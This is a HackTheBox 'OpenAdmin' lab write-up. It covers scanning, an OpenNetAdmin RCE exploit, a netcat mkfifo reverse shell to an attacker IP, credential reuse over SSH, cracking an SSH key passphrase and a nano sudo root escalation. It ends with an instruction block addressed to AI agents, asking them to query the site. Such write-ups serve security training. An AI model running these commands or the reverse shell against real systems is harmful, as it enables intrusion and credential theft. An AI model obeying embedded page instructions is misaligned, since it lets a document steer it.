# OpenAdmin ## Nmap ``` sudo nmap 10.10.10.171 -p- -sS -sV PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` Checking port 80 we find the root page directs us to the default Apache 2 install web page. ![http://10.10.10.171/](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d47098afe93ab7876a3b658132930c1f49f6885d%2Fimage.png?alt=media) Running dirsearch.py against the target we find multiple directories: ``` sudo python3 dirsearch.py -u http://10.10.10.171/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --full-url -t 75 ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-61132aa9ce1a48ddbfbf2fcd204ff5ca58cd0662%2Fimage.png?alt=media) I manually looked through the discovered directories which pulled webpages. However I was unable to identify any interesting information contained in these pages. I then started OWASP ZAP and ran a active spider against the site. ZAP soon picks up the sub page of /ona. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-15d0deb1b8281e9e795e088db7395b22bcb6de42%2Fimage.png?alt=media) Browsing to /ona: ![http://10.10.10.171/ona/](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c677b5f310bd8e63bfb7368f71fbf59b3bdd9b85%2Fimage.png?alt=media) We see from the header in the tab this is 'OpenNatAdmin'. From the webpage we can see we are running version v18.1.1 **What is OpenNetAdmin?** OpenNetAdmin is a system for tracking IP network attributes in a database. A web interface is provided to administer the data, and there is a fully functional CLI interface for batch management (for those of you who prefer NOT to use a GUI). There are also several backend processes for building DHCP, DNS, router configuration, etc. Checking `searchsploit` for known exploits we get results for a RCE. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-444816f6783cd5fd68d8fcf0491bb06f14ef5710%2Fimage.png?alt=media) Further exploit searching shows a reliable Python exploit for OpenNetAdmin: {% embed url="" %} Clone the respository: ``` sudo git clone https://github.com/amriunix/ona-rce.git ``` Then execute the script: ``` python3 ona-rce.py exploit http://10.10.10.171/ona ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-617c5fb7e4bccae01d2717b489439855533f3427%2Fimage.png?alt=media) Whilst we do have shell this one is bound to the current directory and as such we cannot easily navigate the target system. To resolve this first I checked available useful software on the target system. ``` which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5f69a60651abd6a36da18e4e40ff5808588318ef%2Fimage.png?alt=media) Which shows `nc` as being on the target system. I then set a `netcat` listener on my attacking machine to port 443. ``` sudo nc -lvp 443 ``` Then executed the following `netcat` reverse shell on the target system: ``` rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.29 443 >/tmp/f ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-03a57b2ed27ac0d626da4f44446cbfffa213b936%2Fimage.png?alt=media) Now we have a full reverse shell. After some manual enumeration I found some interesting information in `/opt/ona/www/local/config/database_settings.inc.php`. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-b4b0dc33563188ee80422eff031107a3fb03d428%2Fimage.png?alt=media) We have discovered the following MySQL credentials: `ona_sys:n1nj4W4rri0R!` We can also check for password reuse. Looking at the home directory we have two users: jimmy and joanna. I tried using SSH as jimmy and was given access with the password above. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-289fca1bb7b78f127aa37c9dcd131b9a2f4625f6%2Fimage.png?alt=media) From here further enumeration again shows a directory named 'internal' only accessible to jimmy and members of the internal group. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-32596b5f4e5d3190234543a04394a8a9349ab9d6%2Fimage.png?alt=media) Then the following files inside the directory: ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9f07123bf67e6a293ae889730d1f98812907de1e%2Fimage.png?alt=media) Checking the contents of main: ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c357b9702e4e10e5897ff8c99001a6989a89045e%2Fimage.png?alt=media) Looks like when the PHP file is executed it will retrieve Joanna's SSH key. We know this directory is not under the normal port 80. Checking `netstat` we see something is running locally on port 52846. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9f6d8064b10ffa018c5b1987a76720fbb3dc819f%2Fimage.png?alt=media) Running curl against the local port and main.php gives us a valid result. ``` curl http://127.0.0.1:52846/main.php ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-b9a2674ec6b726bd837a42aa0cedb7bb9926c176%2Fimage.png?alt=media) Copy the key to the attacking machine and set correct key permissions: ``` chmod 600 id_rsa ``` As we can see from the line 'Proc-Type: 4,ENCRYPTED' we will need a password to authorize against the key when connecting over SSH. We can use ssh2john.py we generate a hash from this keyfile then crack with John. ``` python2 /usr/share/john/ssh2john.py id_rsa > hash.txt ``` The crack with `John`. ``` sudo john --wordlist=/usr/share/wordlists/rockyou.txt /home/kali/Desktop/hash.txt ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-f5a0531e2874e5f9aa8b6480ed74e48c03e67acd%2Fimage.png?alt=media) We can then use SSH and login as joanna after specifying and authorizing against the SSH key. Using the password found above in John to proceed when asked for a passphrase ``` ssh -i id_rsa joanna@10.10.10.171 ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9ea686720eb709e87fc5707f711d31476271eaf1%2Fimage.png?alt=media) Checking `sudo -l` for `sudo` privileges we see that we can run `/bin/nano /opt/priv` as anyone without providing a password. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-0f0fb772c22ec8f8a26909e3196b997551e4a6c3%2Fimage.png?alt=media) Checking nano against [GTFOBins](https://gtfobins.github.io/gtfobins/nano/) we see we can spawn a shell with the nano binary. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-3445e7ab3c113c23ab5439db05e0cc37f8766e22%2Fimage.png?alt=media) To spawn a root shell run the following command: ``` sudo -u /bin/nano /opt/priv ``` When in a nano editor press the following keys: ``` CTRL+R CTRL+X Then when prompted paste and execute the following: reset; sh 1>&0 2>&0 ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a3f157f72d03c5c757039911577ccd55f61e4fa2%2Fimage.png?alt=media) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://viperone.gitbook.io/pentest-everything/writeups/hackthebox/linux/openadmin.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.